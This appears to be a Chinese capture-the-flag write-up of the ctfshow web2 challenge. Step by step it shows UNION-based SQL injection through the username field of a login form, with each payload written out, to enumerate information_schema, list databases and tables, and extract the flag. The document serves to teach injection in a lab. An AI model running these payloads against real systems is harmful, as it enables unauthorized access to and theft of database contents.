ctfshow-web2(SQL注入)

简介: ctfshow-web2(SQL注入)

打开题目链接,是一个登录框,尝试弱口令登录

没什么反应

尝试万能密码登录

页面发生了变化

并未登录进去,但是有回显,大概率是SQL注入了

这里尝试了很久,尝试过程就不写了,最终判断它的注入点在用户名,而不是密码,密码随便输,而且--+的注释不行,这里要用#来注释。

成功闭合之后先判断字段数

' or 1=1 order by 3 #

正常回显

' or 1=1 order by 4 #

无回显,说明只有3列

判断回显位

' or 1=1 union select 1,2,3 #

在2号位

查数据库名

' or 1=1 union select 1,database(),3 #

数据库名为 web2

查数据库版本

' or 1=1 union select 1,version(),3 #

MariaDB,第一次遇见不是在mysql下的

这里说一下,因为mysql 5.0及其以上的都会自带一个叫information_schema的数据库,相当于是一个已知的数据库,并且该数据库下储存了所有数据库的所以信息。

尝试查询数据库名为web2下的所有表名

' or 1=1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='web2'#

发现该数据库下有两个表:flag,user

查询数据库名为web2下表名为flag的列名信息

' or 1=1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='web2' and table_name='flag'#

该表下的列名也为flag

直接查该列的具体字段信息

' or 1=1 union select 1,flag,3 from web2.flag #

拿到flag

ctfshow{6ce6e249-b399-480c-ae37-93793eea88e2}

前面我们说过,information_schema这个数据库下面包含了所有数据库的所有信息

我们来获取一下所有数据库的数据库名

' or 1=1 union select 1,schema_name,3 from information_schema.schemata #

mysql数据库、web2数据库以及其他所有数据库的所有信息都会储存在information_schema这个数据库下,这也是为什么我们可以借助information_schema这个数据库来查询到其他数据库的信息。

目录
相关文章
|
6天前
|
SQL 数据库
20、绕过去除and、or、union select、空格的sql注入
20、绕过去除and、or、union select、空格的sql注入
11 0
|
6天前
|
SQL 数据库
小课堂 -- 绕过去除特殊字符的sql注入
小课堂 -- 绕过去除特殊字符的sql注入
9 0
|
9天前
|
SQL Java 数据库连接
[SQL]SQL注入与SQL执行过程(基于JDBC)
[SQL]SQL注入与SQL执行过程(基于JDBC)
30 0
|
26天前
|
SQL 关系型数据库 MySQL
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
【MySQL进阶之路丨第十四篇】一文带你精通MySQL重复数据及SQL注入
33 0
|
28天前
|
SQL 测试技术 数据库
SQL注入,跨站脚本,跨站请求伪造,傻傻分不清楚
SQL注入,跨站脚本,跨站请求伪造,傻傻分不清楚
|
1月前
|
SQL 安全 数据库
写一段防止sql注入的sql查询
【1月更文挑战第14天】写一段防止sql注入的sql查询
88 31
|
11天前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
330 0
|
30天前
|
SQL Oracle 关系型数据库
整合Mybatis-Plus高级,Oracle 主键Sequence,Sql 注入器实现自定义全局操作
整合Mybatis-Plus高级,Oracle 主键Sequence,Sql 注入器实现自定义全局操作
76 0
|
1月前
|
SQL Java 数据库连接
通过PreparedStatement预防SQL注入
通过PreparedStatement预防SQL注入
15 0
|
3天前
|
SQL JSON 数据库
常见的sql注入类型闭合及符号
常见的sql注入类型闭合及符号
7 0